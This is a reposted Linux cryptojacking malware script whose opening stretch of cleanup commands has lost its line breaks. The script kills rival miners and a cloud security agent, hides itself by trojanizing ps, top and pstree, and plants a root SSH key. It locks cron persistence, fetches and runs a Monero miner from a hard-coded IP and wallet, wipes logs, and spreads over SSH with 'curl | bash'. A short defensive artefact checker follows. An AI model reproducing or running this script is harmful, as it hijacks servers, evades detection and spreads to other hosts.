/tmp/p2.confrm -rf /tmp/pprtrm -rf /tmp/ppolrm -rf /tmp/javax/config.shrm -rf /tmp/javax/sshd2rm -rf /tmp/.profilerm -rf /tmp/1.sorm -rf /tmp/kworkerdsrm -rf /tmp/kworkerds3rm -rf /tmp/kworkerdssxrm -rf /tmp/xd.jsonrm -rf /tmp/syslogdrm -rf /tmp/syslogdbrm -rf /tmp/65ccEJ7rm -rf /tmp/jmxxrm -rf /tmp/2Ne80nArm -rf 
/tmp/dlrm -rf /tmp/ddgrm -rf /tmp/systemxlvrm -rf /tmp/systemctIrm -rf /tmp/.abcrm -rf /tmp/osw.hbrm -rf /tmp/.tmpleverm -rf /tmp/.tmpnewzzrm -rf /tmp/.javarm -rf /tmp/.omedrm -rf /tmp/.tmpcrm -rf /tmp/.tmpleverm -rf /tmp/.tmpnewzzrm -rf /tmp/gates.lodrm -rf /tmp/conf.nrm -rf /tmp/devtoolrm -rf /tmp/devtoolsrm -rf /tmp/fsrm -rf /tmp/.rodrm -rf /tmp/.rod.tgzrm -rf /tmp/.rod.tgz.1rm -rf /tmp/.rod.tgz.2rm -rf /tmp/.merrm -rf /tmp/.mer.tgzrm -rf /tmp/.mer.tgz.1rm -rf /tmp/.hodrm -rf /tmp/.hod.tgzrm -rf /tmp/.hod.tgz.1rm -rf /tmp/84Onmcerm -rf /tmp/C4iLM4Lrm -rf /tmp/lilpiprm -rf /tmp/3lmigMorm -rf /tmp/am8jmBPrm -rf /tmp/tmp.txtrm -rf /tmp/babyrm -rf /tmp/.librm -rf /tmp/systemdrm -rf /tmp/lib.tar.gzrm -rf /tmp/babyrm -rf /tmp/javarm -rf /tmp/j2.confrm -rf /tmp/.mynews1234rm -rf /tmp/a3e12drm -rf /tmp/.ptrm -rf /tmp/.pt.tgzrm -rf /tmp/.pt.tgz.1rm -rf /tmp/gorm -rf /tmp/javarm -rf /tmp/j2.confrm -rf /tmp/.tmpnewasssrm -rf /tmp/javarm -rf /tmp/go.shrm -rf /tmp/go2.shrm -rf /tmp/khugepagedsrm -rf /tmp/.censusqqqqqqqqqrm -rf /tmp/.kerberodsrm -rf /tmp/kerberodsrm -rf /tmp/seasamerm -rf /tmp/touchrm -rf /tmp/.prm -rf /tmp/runtime2.shrm -rf /tmp/runtime.shrm -rf /dev/shm/z3.shrm -rf /dev/shm/z2.shrm -rf /dev/shm/.scrrm -rf /dev/shm/.kerberodsrm -f /etc/ld.so.preloadrm -f /usr/local/lib/libioset.sochattr -i /etc/ld.so.preloadrm -f /etc/ld.so.preloadrm -f /usr/local/lib/libioset.sorm -rf /tmp/watchdogsrm -rf /etc/cron.d/tomcatrm -rf /etc/rc.d/init.d/watchdogsrm -rf /usr/sbin/watchdogsrm -f /tmp/kthrotldsrm -f /etc/rc.d/init.d/kthrotldsrm -rf /tmp/.sysbabyuuuuu12rm -rf /tmp/logo9.jpgrm -rf /tmp/miner.shrm -rf /tmp/nullcrewrm -rf /tmp/procrm -rf /tmp/2.shrm /opt/atlassian/confluence/bin/1.shrm /opt/atlassian/confluence/bin/1.sh.1rm /opt/atlassian/confluence/bin/1.sh.2rm /opt/atlassian/confluence/bin/1.sh.3rm /opt/atlassian/confluence/bin/3.shrm /opt/atlassian/confluence/bin/3.sh.1rm /opt/atlassian/confluence/bin/3.sh.2rm /opt/atlassian/confluence/bin/3.sh.3rm -rf /var/tmp/f41rm 
-rf /var/tmp/2.shrm -rf /var/tmp/config.jsonrm -rf /var/tmp/xmrigrm -rf /var/tmp/1.sorm -rf /var/tmp/kworkerds3rm -rf /var/tmp/kworkerdssxrm -rf /var/tmp/kworkerdsrm -rf /var/tmp/wc.confrm -rf /var/tmp/nadezhda.rm -rf /var/tmp/nadezhda.armrm -rf /var/tmp/nadezhda.arm.1rm -rf /var/tmp/nadezhda.arm.2rm -rf /var/tmp/nadezhda.x86_64rm -rf /var/tmp/nadezhda.x86_64.1rm -rf /var/tmp/nadezhda.x86_64.2rm -rf /var/tmp/sustse3rm -rf /var/tmp/sustserm -rf /var/tmp/moneroocean/rm -rf /var/tmp/devtoolrm -rf /var/tmp/devtoolsrm -rf /var/tmp/play.shrm -rf /var/tmp/systemctIrm -rf /var/tmp/.javarm -rf /var/tmp/1.shrm -rf /var/tmp/conf.nrm -r /var/tmp/librm -r /var/tmp/.libchattr -iau /tmp/lokchmod +700 /tmp/lokrm -rf /tmp/loksleep 1chattr -i /tmp/kdevtmpfsiecho 1 > /tmp/kdevtmpfsichattr +i /tmp/kdevtmpfsisleep 1chattr -i /tmp/redis2echo 1 > /tmp/redis2chattr +i /tmp/redis2chattr -ia /.Xll/xr>/.Xll/xrchattr +ia /.Xll/xrchattr -ia /etc/trace>/etc/tracechattr +ia /etc/tracechattr -ia /etc/newsvc.shchattr -ia /etc/svc*chattr -ia /tmp/newsvc.shchattr -ia /tmp/svc*>/etc/newsvc.sh>/etc/svcupdate>/etc/svcguard>/etc/svcworkmanager>/etc/svcupdates>/tmp/newsvc.sh>/tmp/svcupdate>/tmp/svcguard>/tmp/svcworkmanager>/tmp/svcupdateschattr +ia /etc/newsvc.shchattr +ia /etc/svc*chattr +ia /tmp/newsvc.shchattr +ia /tmp/svc*sleep 1chattr -ia /etc/phpupdatechattr -ia /etc/phpguardchattr -ia /etc/networkmanagerchattr -ia /etc/newdat.sh>/etc/phpupdate>/etc/phpguard>/etc/networkmanager>/etc/newdat.shchattr +ia /etc/phpupdatechattr +ia /etc/phpguardchattr +ia /etc/networkmanagerchattr +ia /etc/newdat.shsleep 1chattr -i /usr/lib/systemd/systemd-update-dailyecho 1 > /usr/lib/systemd/systemd-update-dailychattr +i /usr/lib/systemd/systemd-update-daily#yum install -y docker.io || apt-get install docker.io;docker ps | grep "pocosow" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "gakeaws" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "azulu" | awk '{print $1}' | xargs -I % docker 
kill %docker ps | grep "auto" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "xmr" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "mine" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "slowhttp" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "bash.shell" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "entrypoint.sh" | awk '{print $1}' | xargs -I % docker kill %docker ps | grep "/var/sbin/bash" | awk '{print $1}' | xargs -I % docker kill %docker images -a | grep "pocosow" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "gakeaws" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "buster-slim" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "hello-" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "azulu" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "registry" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "xmr" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "auto" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "mine" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "monero" | awk '{print $3}' | xargs -I % docker rmi -f %docker images -a | grep "slowhttp" | awk '{print $3}' | xargs -I % docker rmi -f %#echo SELINUX=disabled >/etc/selinux/configservice apparmor stopsystemctl disable apparmorservice aliyun.service stopsystemctl disable aliyun.serviceps aux | grep -v grep | grep 'aegis' | awk '{print $2}' | xargs -I % kill -9 %ps aux | grep -v grep | grep 'Yun' | awk '{print $2}' | xargs -I % kill -9 %rm -rf /usr/local/aegischattr -R -ia /var/spool/cronchattr -ia /etc/crontabchattr -R -ia /etc/cron.dchattr -R -ia /var/spool/cron/crontabscrontab -rrm -rf /var/spool/cron/*rm -rf /etc/cron.d/*rm -rf /var/spool/cron/crontabsrm -rf /etc/crontab}kill_sus_proc(){
ps axf -o "pid"|while read procid do ls -l /proc/$procid/exe | grep /tmp if [ $? -ne 1 ] then cat /proc/$procid/cmdline| grep -a -E "zzh" if [ $? -ne 0 ] then kill -9 $procid else echo "don't kill" fi fi done ps axf -o "pid %cpu" | awk '{if($2>=40.0) print $1}' | while read procid do cat /proc/$procid/cmdline| grep -a -E "zzh" if [ $? -ne 0 ] then kill -9 $procid else echo "don't kill" fi done}downloads(){
if [ -f "/usr/bin/curl" ] then echo $1,$2 http_code=`curl -I -m 50 -o /dev/null -s -w %{
http_code} $1` if [ "$http_code" -eq "200" ] then curl --connect-timeout 100 --retry 100 $1 > $2 elif [ "$http_code" -eq "405" ] then curl --connect-timeout 100 --retry 100 $1 > $2 else curl --connect-timeout 100 --retry 100 $3 > $2 fi elif [ -f "/usr/bin/cd1" ] then http_code=`cd1 -I -m 50 -o /dev/null -s -w %{
http_code} $1` if [ "$http_code" -eq "200" ] then cd1 --connect-timeout 100 --retry 100 $1 > $2 elif [ "$http_code" -eq "405" ] then cd1 --connect-timeout 100 --retry 100 $1 > $2 else cd1 --connect-timeout 100 --retry 100 $3 > $2 fi elif [ -f "/usr/bin/wget" ] then wget --timeout=50 --tries=100 -O $2 $1 if [ $? -ne 0 ] then wget --timeout=100 --tries=100 -O $2 $3 fi elif [ -f "/usr/bin/wd1" ] then wd1 --timeout=100 --tries=100 -O $2 $1 if [ $? -eq 0 ] then wd1 --timeout=100 --tries=100 -O $2 $3 fi fi}kill_miner_prockill_sus_procunlock_cron(){
chattr -R -ia /var/spool/cron chattr -ia /etc/crontab chattr -R -ia /var/spool/cron/crontabs chattr -R -ia /etc/cron.d}lock_cron(){
    chattr -R +ia /var/spool/cron
    chattr +ia /etc/crontab
    chattr -R +ia /var/spool/cron/crontabs
    chattr -R +ia /etc/cron.d
}

if [ -f "$rtdir" ]
then
    echo "i am root"
    mkdir -p /root/.ssh
    echo "goto 1" >> /etc/zzhs
    chattr -ia /etc/zzh*
    chattr -ia/etc/config.json*
    chattr -ia /etc/newinit.sh*
    chattr -ia /root/.ssh/authorized_keys*
    chattr -R -ia /root/.ssh
    if [ -f "/bin/ps.original" ]
    then
        echo "/bin/ps changed"
    else
        mv /bin/ps /bin/ps.original
        echo "#! /bin/bash">>/bin/ps
        echo "ps.original \$@ | grep -v \"zzh\|pnscan\"">>/bin/ps
        chmod +x /bin/ps
        touch -d 20160825 /bin/ps
        echo "/bin/ps changing"
    fi
    if [ -f "/bin/top.original" ]
    then
        echo "/bin/top changed"
    else
        mv /bin/top /bin/top.original
        echo "#! /bin/bash">>/bin/top
        echo "top.original \$@ | grep -v \"zzh\|pnscan\"">>/bin/top
        chmod +x /bin/top
        touch -d 20160825 /bin/top
        echo "/bin/top changing"
    fi
    if [ -f "/bin/pstree.original" ]
    then
        echo "/bin/pstree changed"
    else
        mv /bin/pstree /bin/pstree.original
        echo "#! /bin/bash">>/bin/pstree
        echo "pstree.original \$@ | grep -v \"zzh\|pnscan\"">>/bin/pstree
        chmod +x /bin/pstree
        touch -d 20160825 /bin/pstree
        echo "/bin/pstree changing"
    fi
    if [ -f "/bin/chattr" ]
    then
        chattrsize=`ls -l /bin/chattr | awk '{ print $5 }'`
        if [ "$chattrsize" -lt "$chattr_size" ]
        then
            yum -y remove e2fsprogs
            yum -y install e2fsprogs
        else
            echo "no need install chattr"
        fi
    else
        yum -y remove e2fsprogs
        yum -y install e2fsprogs
    fi
    unlock_cron
    rm -f ${crondir}
    rm -f /etc/cron.d/zzh
    rm -f /etc/crontab
    echo "*/30 * * * * sh /etc/newinit.sh >/dev/null 2>&1" >> ${crondir}
    echo "*/40 * * * * root sh /etc/newinit.sh >/dev/null 2>&1" >> /etc/cron.d/zzh
    echo "0 1 * * * root sh /etc/newinit.sh >/dev/null 2>&1" >> /etc/crontab
    echo crontab created
    lock_cron
    chmod 700 /root/.ssh/
    echo >> /root/.ssh/authorized_keys
    chmod 600 /root/.ssh/authorized_keys
    echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCmEFN80ELqVV9enSOn+05vOhtmmtuEoPFhompw+bTIaCDsU5Yn2yD77Yifc/yXh3O9mg76THr7vxomguO040VwQYf9+vtJ6CGtl7NamxT8LYFBgsgtJ9H48R9k6H0rqK5Srdb44PGtptZR7USzjb02EUq/15cZtfWnjP9pKTgscOvU6o1Jpos6kdlbwzNggdNrHxKqps0so3GC7tXv/GFlLVWEqJRqAVDOxK4Gl2iozqxJMO2d7TCNg7d3Rr3w4xIMNZm49DPzTWQcze5XciQyNoNvaopvp+UlceetnWxI1Kdswi0VNMZZOmhmsMAtirB3yR10DwH3NbEKy+ohYqBL root@puppetserver" > /root/.ssh/authorized_keys
    cd1 http://199.19.226.117/b2f628/call.txt
    wget -q -O- http://199.19.226.117/b2f628/call.txt
    cd1 http://199.19.226.117/b2f628/call.txt
    wget -q -O- http://199.19.226.117/b2f628/call.txt
    cfg="/etc/config.json"
    file="/etc/zzh"
    if [-f "/etc/config.json" ]
    then
        filesize_config=`ls -l /etc/config.json | awk '{ print $5 }'`
        if [ "$filesize_config" -ne "$config_size" ]
        then
            pkill -f zzh
            rm /etc/config.json
            downloads $config_url /etc/config.json $config_url_backup
        else
            echo "no need download"
        fi
    else
        downloads $config_url /etc/config.json $config_url_backup
    fi
    if [ -f "/etc/zzh" ]
    then
        filesize1=`ls -l /etc/zzh | awk '{ print $5 }'`
        if [ "$filesize1" -ne "$miner_size" ]
        then
            pkill -f zzh
            rm /etc/zzh
            downloads $miner_url /etc/zzh $miner_url_backup
        else
            echo "not need download"
        fi
    else
        downloads $miner_url /etc/zzh $miner_url_backup
    fi
    downloads $sh_url /etc/newinit.sh $sh_url_backup
    chmod 777 /etc/zzh
    if [ -f "/bin/ps.original" ]
    then
        ps.original -fe|grep zzh |grep -v grep
    else
        ps -fe|grep zzh |grep -v grep
    fi
    if [ $? -ne 0 ]
    then
        cd /etc
        echo "not root runing"
        sleep 5s
        cpunum=`cat /proc/cpuinfo |grep -i model|grep name|wc -l`
        if (("$cpunum"<=2 )); then
            cpunum=1
            echo $cpunum
        elif (("$cpunum"<=4)); then
            cpunum=2
            echo $cpunum
        elif (("$cpunum"<=8)); then
            cpunum=4
            echo $cpunum
        elif (("$cpunum"<=16)); then
            cpunum=8
            echo $cpunum
        elif (("$cpunum"<=32)); then
            cpunum=16
            echo $cpunum
        elif (("$cpunum"<=64)); then
            cpunum=32
            echo $cpunum
        elif (("$cpunum">64)); then
            cpunum=50
            echo $cpunum
        else
            cpunum=1
        fi
        ./zzh -B --log-file=/etc/etc --coin=monero -o stratum+tcp://xmr-asia1.nanopool.org:14444 --threads=$cpunum -u 43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz -p x &
    else
        echo "root runing....."
    fi
    chmod 777 /etc/zzh
    chattr +ia /etc/zzh
    chmod 777 /etc/config.json
    chattr +ia /etc/config.json
    chmod 777 /etc/newinit.sh
    chattr +ia /etc/newinit.sh
    chmod 600 /root/.ssh/authorized_keys
    chattr +ia /root/.ssh/authorized_keys
else
    echo "goto 1" > /tmp/zzhs
    chattr -ia /tmp/zzh*
    chattr -ia /tmp/config.json*
    chattr -ia /tmp/newinit.sh*
    if [ ! -f "/usr/bin/crontab" ]
    then
        unlock_cron
        echo "*/30 * * * * sh /tmp/newinit.sh >/dev/null 2>&1" >> ${crondir}
        lock_cron
    else
        unlock_cron
        [[ $cont =~ "newinit.sh" ]] || (crontab -l ; echo "*/30 * * * * sh /tmp/newinit.sh >/dev/null 2>&1") | crontab -
        lock_cron
    fi
    if [ -f "/tmp/config.json" ]
    then
        filesize1=`ls -l /tmp/config.json | awk '{ print $5 }'`
        if [ "$filesize1" -ne "$config_size" ]
        then
            pkill -f zzh
            rm /tmp/config.json
            downloads $config_url /tmp/config.json $config_url_backup
        else
            echo "no need download"
        fi
    else
        downloads $config_url /tmp/config.json $config_url_backup
    fi
    if [ -f "/tmp/zzh" ]
    then
        filesize1=`ls -l /tmp/zzh | awk '{ print $5 }'`
        if [ "$filesize1" -ne "$miner_size" ]
        then
            pkill -f zzh
            rm /tmp/zzh
            downloads $miner_url /tmp/zzh $miner_url_backup
        else
            echo "no need download"
        fi
    else
        downloads $miner_url /tmp/zzh $miner_url_backup
    fi
    echo "i am here"
    downloads $sh_url /tmp/newinit.sh $sh_url_backup
    ps -fe|grep zzh |grep -v grep
    if [ $? -ne 0 ]
    then
        echo "not tmp runing"
        cd /tmp
        chmod 777 zzh
        sleep 5s
        cpunum=`cat /proc/cpuinfo |grep -i model|grep name|wc -l`
        if (("$cpunum"<=2 )); then
            cpunum=1
            echo $cpunum
        elif (("$cpunum"<=4)); then
            cpunum=2
            echo $cpunum
        elif (("$cpunum"<=8)); then
            cpunum=4
            echo $cpunum
        elif (("$cpunum"<=16)); then
            cpunum=8
            echo $cpunum
        elif (("$cpunum"<=32)); then
            cpunum=16
            echo $cpunum
        elif (("$cpunum"<=64)); then
            cpunum=32
            echo $cpunum
        elif (("$cpunum">64)); then
            cpunum=50
            echo $cpunum
        else
            echo other
        fi
        ./zzh -B --log-file=/etc/etc --coin=monero -o stratum+tcp://xmr-asia1.nanopool.org:14444 --threads=$cpunum -u 43Xbgtym2GZWBk87XiYbCpTKGPBTxYZZWi44SWrkqqvzPZV6Pfmjv3UHR6FDwvPgePJyv9N5PepeajfmKp1X71EW7jx4Tpz -p x &
    else
        echo "tmp runing....."
    fi
    chmod 777 /tmp/zzh
    chattr +i /tmp/zzh
    chmod 777 /tmp/newinit.sh
    chattr +i /tmp/newinit.sh
    chmod 777 /tmp/config.json
    chattr +i /tmp/config.json
fi
iptables -F
iptables -X
iptables -A OUTPUT -p tcp --dport 5555 -j DROP
iptables -A OUTPUT -p tcp --dport 7777 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
iptables -A OUTPUT -p tcp --dport 9999 -j DROP
service iptables reload
ps auxf|grep -v grep|grep -v 43Xbgtym2GZWBk87XiYbCpTKGPBTxY|grep "stratum"|awk '{print $2}'|xargs kill -9
history -c
echo > /var/spool/mail/root
echo > /var/log/wtmp
echo > /var/log/secure
echo > /root/.bash_history
yum install -y bash 2>/dev/null
apt install -y bash 2>/dev/null
apt-get install -y bash 2>/dev/null
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
    for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'curl -o- http://199.19.226.117/b2f628fff19fda999999999/is.sh | bash >/dev/null 2>&1 &' & done
fi
if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
    for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h 'cd1 -o- http://199.19.226.117/b2f628fff19fda999999999/is.sh | bash >/dev/null 2>&1 &' & done
fi
echo "$bbdir"
echo "$bbdira"
$bbdir -fsSL http://199.19.226.117/b2f628fff19fda999999999/is.sh | bash
$bbdira -fsSL http://199.19.226.117/b2f628fff19fda999999999/is.sh | bash
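
A read-only check for the persistence artefacts visible in the script above, added here as an example; it is not part of the original post or of the attack script. The function name `scan_host`, its `ROOT` prefix argument and the `--scan` switch are assumptions of this example, while every path and string it looks for is taken from the appendix script.

```shell
#!/bin/sh
# scan_host ROOT prints one line per finding; returns 0 if clean, 1 if not.
# ROOT is a path prefix: empty for the live system, or a mounted disk image.
scan_host() {
    root="${1:-}"; hits=0
    hit() { echo "FINDING: $*"; hits=$((hits + 1)); }

    # ps, top and pstree are moved to *.original and replaced by wrappers
    # that pipe the real tool through grep -v, so inspect files, not ps output.
    for t in ps top pstree; do
        if [ -f "$root/bin/$t.original" ]; then hit "/bin/$t.original exists"; fi
        if [ -f "$root/bin/$t" ] &&
           grep -q "$t\.original .*grep -v" "$root/bin/$t"; then
            hit "/bin/$t is a wrapper that filters its own output"
        fi
    done

    # Renamed curl/wget (cd1, wd1) and the dropped miner, marker and script.
    for f in /usr/bin/cd1 /usr/bin/wd1 /etc/zzh /etc/zzhs /etc/newinit.sh \
             /tmp/zzh /tmp/zzhs /tmp/newinit.sh; do
        if [ -e "$root$f" ]; then hit "artefact present: $f"; fi
    done

    # Cron persistence: every crontab line the script writes runs newinit.sh.
    for c in "$root/etc/crontab" "$root"/etc/cron.d/* \
             "$root"/var/spool/cron/* "$root"/var/spool/cron/crontabs/*; do
        if [ -f "$c" ] && grep -q 'newinit\.sh' "$c"; then
            hit "cron entry runs newinit.sh: ${c#$root}"
        fi
    done

    # authorized_keys is overwritten with one key, comment root@puppetserver.
    if grep -q 'root@puppetserver' "$root/root/.ssh/authorized_keys" 2>/dev/null; then
        hit "planted SSH key in /root/.ssh/authorized_keys"
    fi

    # chattr +i / +a is why rm fails even for root; report locked paths.
    for f in /etc/crontab /etc/cron.d /var/spool/cron /etc/newinit.sh \
             /etc/zzh /root/.ssh/authorized_keys; do
        if lsattr -d "$root$f" 2>/dev/null | cut -d' ' -f1 | grep -q '[ia]'; then
            hit "$f is immutable or append-only (chattr -ia before removing)"
        fi
    done
    echo "$hits finding(s)"
    [ "$hits" -eq 0 ]
}

# Runs only on request, so the file can also be sourced: sh triage.sh --scan [ROOT]
if [ "${1:-}" = "--scan" ]; then scan_host "${2:-}"; fi
```

Because the live `ps`, `top` and `pstree` are replaced by filtering wrappers, the check is most reliable when run from rescue media against the mounted root filesystem, passed as `ROOT`.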

Reposted from: http://gteab.baihongyu.com/
